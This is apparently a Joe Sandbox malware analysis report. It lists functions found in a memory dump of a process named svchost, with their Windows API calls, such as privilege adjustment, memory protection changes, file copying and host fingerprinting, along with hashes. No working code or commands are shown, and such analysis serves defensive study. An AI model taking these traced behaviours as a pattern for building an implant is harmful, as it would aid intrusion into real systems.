Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: 36bb858738444389e26b1d781cac17c32a7330680395b2a0a91ab3b60d2d9485
Instruction ID: b1a7470cd0319194f3ef265e384cf0d544d74c24e5d100b98d8de2fbe2185a0d
Opcode Fuzzy Hash: 36bb858738444389e26b1d781cac17c32a7330680395b2a0a91ab3b60d2d9485
Instruction Fuzzy Hash: A32149B1960204BBEF324F95DC0DFBEBA3CEB46756F140594F501A62A0CF318AA0DA60

Uniqueness

Uniqueness Score: -1.00%

Function 02692DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,026951B9,?,026970E8,00000000,00000000,?), ref: 02692DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,026951B9,?,026970E8,00000000,00000000,?,00000000), ref: 02692DDC
CloseHandle.KERNEL32(00000000,?,026951B9,?,026970E8,00000000,00000000,?,00000000), ref: 02692E4D

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: b3bf1f7fb3495dbbd39d0fa9942ab2fe5ab294d99033fa355fc94c008c9732e2
Instruction ID: 9e3038472e4e324ad5599bd064e4534d51c08f7cb31ca336ae3b875478c3c8a7
Opcode Fuzzy Hash: b3bf1f7fb3495dbbd39d0fa9942ab2fe5ab294d99033fa355fc94c008c9732e2
Instruction Fuzzy Hash: 18117FB5950221BFDB224F20DC98A6FBA6CFB4A661F004919FE42D6290CF30C552CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02694068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,0269373D,?,00100000,00000006,?), ref: 0269406D
RtlAllocateHeap.NTDLL(00000000,?,0269373D), ref: 02694074
CreateFileMappingW.KERNELBASE(000000FF,026962B8,00000004,00000000,?,?,?,?,?,0269373D,?,00100000,00000006,?), ref: 0269409B
GetLastError.KERNEL32(?,?,?,0269373D,?,00100000,00000006,?), ref: 026940A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,0269373D,?,00100000,00000006,?), ref: 026940C6
CloseHandle.KERNEL32(00000000,?,?,?,0269373D,?,00100000,00000006,?), ref: 026940D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0269373D,?,00100000,00000006,?), ref: 026940DE
HeapFree.KERNEL32(00000000,?,?,?,0269373D,?,00100000,00000006,?), ref: 026940E5

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: b1d69e2e7214aada0701e2aa73ae9d8124e6407d521909a99ca8beebc21716e0
Instruction ID: 1bdee324f2ef1e2edb6945974403d9545e2d552a92de98e67b21a9be2ca14978
Opcode Fuzzy Hash: b1d69e2e7214aada0701e2aa73ae9d8124e6407d521909a99ca8beebc21716e0
Instruction Fuzzy Hash: 3F1182B5684346AFDB218F64EC48F2ABBECEF09711F058818F655DA291DF30D8518F10

Uniqueness

Uniqueness Score: -1.00%

Function 02691FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02691FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02692009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02692014
CloseHandle.KERNEL32 ref: 02692025

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: 19b0796404182e8c6568f7cc19e0ebd3ee6694a14f54f542bd9a34c91448b9cc
Instruction ID: 8aad701015dbe5c23df531698343b07bf2817702ee1a7a07c7ca0446dce03aa1
Opcode Fuzzy Hash: 19b0796404182e8c6568f7cc19e0ebd3ee6694a14f54f542bd9a34c91448b9cc
Instruction Fuzzy Hash: A4E01AB09A22717B9B322F36BC1DDCB7E5DEF0B2A93055811B809C0108DF2084A2CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 026926ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02692709
RtlGetVersion.NTDLL(?), ref: 0269271E

Part of subcall function 02693641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02692790), ref: 02693659

Strings

f<v, xrefs: 026927BD

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: 447dc6d4a9dfcf311c26242bc69828fc1621e32d545d5724afdc0437bc29bc68
Instruction ID: 2cda9c30d642395e19715099eb9448824e21df528faa8c84ea48b057f424d02c
Opcode Fuzzy Hash: 447dc6d4a9dfcf311c26242bc69828fc1621e32d545d5724afdc0437bc29bc68
Instruction Fuzzy Hash: 1621D735C843ACAADF119FB4E8A16DE7FAC9F16300F0428DBD94493302DE2105A5CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0269492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,026970E8), ref: 02694982
HeapFree.KERNEL32(00000000,?,00000000,00000000,026970E8), ref: 02694989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,026970E8), ref: 026949B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,026970E8), ref: 026949B8

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 61fd346a64b298c1e7165b574c34c5b12b40e9c5abf9d187d3ec7218183c5d09
Instruction ID: b877eaa6ba9ac40517d7fde23190bb02940608fe2d59e48cf8a8785da40167a0
Opcode Fuzzy Hash: 61fd346a64b298c1e7165b574c34c5b12b40e9c5abf9d187d3ec7218183c5d09
Instruction Fuzzy Hash: 1B11CEB6944208AFDF11DEA4D808BEEF7BCFB49305F04459AED44D6240EF319655CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02692C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(026963B4,?), ref: 02692C67

Part of subcall function 026955BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 026955D3
Part of subcall function 026955BC: CreateDirectoryW.KERNELBASE(?,026962B8), ref: 0269561C

Part of subcall function 02692D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02692D86
Part of subcall function 02692D40: RtlFreeHeap.NTDLL(00000000), ref: 02692D8D

lstrcpyW.KERNEL32(026963B4,?), ref: 02692CC7
lstrcatW.KERNEL32(?,0269738C), ref: 02692CD9

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: b743517bd48752671b2198871552348582ad14dc8c1f00ca473b100ab8166949
Instruction ID: b7a9fc48faae6a7ba747808dea71f470ed8ec0ccc9cb5d3b87c44ab92c53ee28
Opcode Fuzzy Hash: b743517bd48752671b2198871552348582ad14dc8c1f00ca473b100ab8166949
Instruction Fuzzy Hash: E021E6B2940208AFDF21DFA4DC49BDA77BCAB09304F44046AF909D2151EF309698CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02692833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02692858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0269287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 026928A3

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: ecfb2d2ac516b2e24048c350e02edcd6902bdf61ec6c3ea720d2c28c9ccf4366
Instruction ID: d14f989a5c6019bdb66f80ea0bd698d0591687ad614ff4f47bb4dc7131715137
Opcode Fuzzy Hash: ecfb2d2ac516b2e24048c350e02edcd6902bdf61ec6c3ea720d2c28c9ccf4366
Instruction Fuzzy Hash: B3215CB6940348AFCB25CF25E9849DF7BACEF05214B001626FC15D3282DB30D96ACB94

Uniqueness

Uniqueness Score: -1.00%

Function 02695108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 026954AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 026954C0
Part of subcall function 026954AC: CreateDirectoryW.KERNELBASE(00000000,026962B8), ref: 02695500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0269513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0269515E
CloseHandle.KERNEL32(00000000), ref: 02695167

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: 9a72b1b2559353f33ac627a97ad3b566ec612c25e3ad03c2ee65d113ed5c2b97
Instruction ID: 9ea041eb2483758661c9b1c9920c663bc6cb219d0e9dabeb8a2a128a734060e7
Opcode Fuzzy Hash: 9a72b1b2559353f33ac627a97ad3b566ec612c25e3ad03c2ee65d113ed5c2b97
Instruction Fuzzy Hash: 7B01DB725443087FDB325E60EC48F6FB79CE786764F504A29FA52D2180DB3155058A61

Uniqueness

Uniqueness Score: -1.00%

Function 02692EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02692D76,?,?,?,?), ref: 02692ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,02692D76,?,?,?,?,?), ref: 02692EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02692D76,?,?,?,?,?), ref: 02692EFD

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 7d343f5762083a42371b6077b4144edbe1b72c7e487602ae7400e0ac4affce39
Instruction ID: 737e04b9578a1515147f58db1eaeaf862cf51d3e7db550f2dae9df0cd0850e61
Opcode Fuzzy Hash: 7d343f5762083a42371b6077b4144edbe1b72c7e487602ae7400e0ac4affce39
Instruction Fuzzy Hash: 7AF0F6B2995118BBDF304D71AC48FAFBA6CEB466B4F000621FD05D3180DB30494186F0

Uniqueness

Uniqueness Score: -1.00%

Function 02692D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02692DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,026951B9,?,026970E8,00000000,00000000,?), ref: 02692DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 02692DA5

Part of subcall function 02692EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02692D76,?,?,?,?), ref: 02692ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02692D86
RtlFreeHeap.NTDLL(00000000), ref: 02692D8D

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 380858458cab652c8b0f86925a9dd8c78faf6859737447547430538c040bf8a3
Instruction ID: a09765c8c0b26930cbbd141c2d6c3d45edd58f048b19b6a7308d1adb09719ced
Opcode Fuzzy Hash: 380858458cab652c8b0f86925a9dd8c78faf6859737447547430538c040bf8a3
Instruction Fuzzy Hash: D0014B76801108BBCF12AFA4DC19FDDBB3EEB04310F0045A5FD09A6160DB328A64EB90

Uniqueness

Uniqueness Score: -1.00%

Function 02692674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02692679

Part of subcall function 02692973: lstrcpyW.KERNEL32(026962F2,026963B4), ref: 0269298C
Part of subcall function 02692973: lstrcatW.KERNEL32(026962F0,02697338), ref: 0269299C
Part of subcall function 02692973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 026929A7

Part of subcall function 026926ED: memset.MSVCRT ref: 02692709
Part of subcall function 026926ED: RtlGetVersion.NTDLL(?), ref: 0269271E

Part of subcall function 02693555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02693570
Part of subcall function 02693555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02693585
Part of subcall function 02693555: GetLastError.KERNEL32 ref: 0269358B
Part of subcall function 02693555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 026935A1
Part of subcall function 02693555: RtlAllocateHeap.NTDLL(00000000), ref: 026935A8
Part of subcall function 02693555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 026935C1
Part of subcall function 02693555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 026935CF
Part of subcall function 02693555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 026935F0
Part of subcall function 02693555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 026935FD
Part of subcall function 02693555: HeapFree.KERNEL32(00000000), ref: 02693604

ExitProcess.KERNEL32 ref: 026926E6

Part of subcall function 026925E3: lstrcpyW.KERNEL32(?,02697328), ref: 026925F6
Part of subcall function 026925E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02692612
Part of subcall function 026925E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02692623
Part of subcall function 026925E3: GetLastError.KERNEL32 ref: 0269262D

Part of subcall function 02692C33: StrStrIW.KERNELBASE(026963B4,?), ref: 02692C67

Part of subcall function 02691BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02691BFF
Part of subcall function 02691BB9: HeapFree.KERNEL32(00000000), ref: 02691C06

Part of subcall function 02691FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02691FF0
Part of subcall function 02691FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02692009
Part of subcall function 02691FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02692014

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: 74f7012bec01aa8157638e96e9d13516657499ffcc5b193f8ec83ba24258bd1e
Instruction ID: 3aae2337b0570b33ed5dbccf9beb41e5404c4eb8418de3fe86b25baa588966a0
Opcode Fuzzy Hash: 74f7012bec01aa8157638e96e9d13516657499ffcc5b193f8ec83ba24258bd1e
Instruction Fuzzy Hash: 7DF039B06803427FEF003BF59D2572E355F5F01706F2408ADAD49CA694DF1094614E3E

Uniqueness

Uniqueness Score: -1.00%

Function 026929F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4902554d0f8a9e0893c83e66afe1bc961eb79998a9305f0ec76b4fffbfb6eba
Instruction ID: 5338e3e7c23c697531dd24285e8c8de631a0b59fc9a2f5ba45ddd7e31fb7c7b2
Opcode Fuzzy Hash: a4902554d0f8a9e0893c83e66afe1bc961eb79998a9305f0ec76b4fffbfb6eba
Instruction Fuzzy Hash: E4515A76654302AFEB18CF64D860AAA73ECFF98618F05486DF856C7254EB30E944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 026954AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 026954C0
CreateDirectoryW.KERNELBASE(00000000,026962B8), ref: 02695500

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: 78f9a15677fc4e667fc18c13d7c86c46c7f9f8e06af263e8280964d4300621ab
Instruction ID: 3db8216d7b00ffeb9d1848b0a5adecfb79c244c7fcf50f56b856f5b686fddebb
Opcode Fuzzy Hash: 78f9a15677fc4e667fc18c13d7c86c46c7f9f8e06af263e8280964d4300621ab
Instruction Fuzzy Hash: 49110BB29002187EFB01ABA0AC45DFF7FBCCF85A51F10005BF904D3140ED2856469B75

Uniqueness

Uniqueness Score: -1.00%

Function 026955BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 026955D3
CreateDirectoryW.KERNELBASE(?,026962B8), ref: 0269561C

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: c5e15f5ca32555fea0348f41f4ffc582ceddea87cd735d79404269de4a5b6b3d
Instruction ID: ee0292fd283065ba9f100f673e2062214669e5992f4f8906729e919aaaf095b7
Opcode Fuzzy Hash: c5e15f5ca32555fea0348f41f4ffc582ceddea87cd735d79404269de4a5b6b3d
Instruction Fuzzy Hash: 8A01B5F2A402183EFF026AA5EC89DBFBB7CEB85A65B14001EF905D2140DD2469158AB5

Uniqueness

Uniqueness Score: -1.00%

Function 02691BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02691BFF
HeapFree.KERNEL32(00000000), ref: 02691C06

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 40824d5617e0ff5f86b328f205e6394f292973f05faf110b6b4fa08ad0e43cf2
Instruction ID: d8406bc833d49e1ed9de0dff3b9d6cada48f74d8313464fed0ca4e4a39aef300
Opcode Fuzzy Hash: 40824d5617e0ff5f86b328f205e6394f292973f05faf110b6b4fa08ad0e43cf2
Instruction Fuzzy Hash: 8AF03AB6D40109FBDF01EBE8CD05B9EB77CAB05306F1405D1FA14E2280EA759624EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02693641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02692790), ref: 02693659

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 9be2af9a36e9889ba292e056347765c0a811004e612f1d9e5dc4848bdc93b7fe
Instruction ID: afd80dcdfba240b94f2ffe8d50eb48460216469935e6aea8174035f67e81a420
Opcode Fuzzy Hash: 9be2af9a36e9889ba292e056347765c0a811004e612f1d9e5dc4848bdc93b7fe
Instruction Fuzzy Hash: 6CD0C233A1421C56CB00AAB9A9099CFF7FC9B8C610F0049A6E501E7140E862999442E0

Uniqueness

Uniqueness Score: -1.00%

Function 026929AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02692BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02692BDA
Part of subcall function 02692BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02692C23

Sleep.KERNELBASE(000000FF), ref: 026929E9

Part of subcall function 02692674: SetErrorMode.KERNELBASE(00008007), ref: 02692679

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: 6794dd64405baf8ac97ed6072fe5d16e3a96ce8032b532acfad1179050297875
Instruction ID: 40f86923de84a41dd8d276c6109bf96bd0b4a5eb2379e89322bcdb6403ee0318
Opcode Fuzzy Hash: 6794dd64405baf8ac97ed6072fe5d16e3a96ce8032b532acfad1179050297875
Instruction Fuzzy Hash: 0CE012329142116FCF50ABA59928BDA32EC6F19714F050661BD218F294DF208C80DB55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02693E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,026973C8,00000001,F0000000,00000094,?), ref: 02693EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02693EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02693ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02693EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02693F0D
CryptDestroyKey.ADVAPI32(?), ref: 02693F18
CryptDestroyHash.ADVAPI32(?), ref: 02693F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02693F30

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: 4848caec5969020b3cd85681ad6a13d7da4c431fc0cde09085fcf2c2cdc0a91f
Instruction ID: 36c45e753a56c440434531b7e38b73334bd242837f4436e6ac492c4ea32e82b3
Opcode Fuzzy Hash: 4848caec5969020b3cd85681ad6a13d7da4c431fc0cde09085fcf2c2cdc0a91f
Instruction Fuzzy Hash: 1E211DB6D40158BBCF225F95DD09E9FFF7DEB85B01F004595F900A2250DB318A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02692F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02697658,00000000,00000000,00000001,F0000000,026962B0,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F35
CryptCreateHash.ADVAPI32(02697658,00008003,00000000,00000000,?,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F52
CryptHashData.ADVAPI32(?,02697658,?,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02695B88,?,00000000,?), ref: 02692FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692FB3
CryptReleaseContext.ADVAPI32(02697658,00000000,?,?,?,02695B88,?,00000000,?,?,02697658,?), ref: 02692FC2

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: 429289ef258d29b1f2801744edac0f53f21a03a53aca90c43f54233170f964e4
Instruction ID: 22be8476d3e8a0cda9d8720964d2e4b9c0394b7fda6f8a3364bb23c527d5ab1d
Opcode Fuzzy Hash: 429289ef258d29b1f2801744edac0f53f21a03a53aca90c43f54233170f964e4
Instruction Fuzzy Hash: D1215EB184011DFFDF128F90DC85EAEBB7CEB04755F0045A5FE01A2250EB318E609B90

Uniqueness

Uniqueness Score: -1.00%

Function 026939E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02691210,?,026971F0,?), ref: 026939F4
OpenProcessToken.ADVAPI32(00000000,?,02691210,?,026971F0,?), ref: 026939FB
LookupPrivilegeValueA.ADVAPI32(00000000,026971F0,02691210), ref: 02693A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02693A36
CloseHandle.KERNEL32(?,?,?,?,02691210,?,026971F0,?), ref: 02693A41

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 5cb7ebcb5eb563ab50ef6682d99fd2a7522f5f731e140ea41c1701da936df8d2
Instruction ID: 20c831ea83e280d50381dae7f98dbfdf3990458fcda757081c11d7475a490117
Opcode Fuzzy Hash: 5cb7ebcb5eb563ab50ef6682d99fd2a7522f5f731e140ea41c1701da936df8d2
Instruction Fuzzy Hash: 15F03CB6D10158BBDB219F95DD0CEAFBFFCEB89B10F040595BC05E2200DB308A64CAA1

Uniqueness

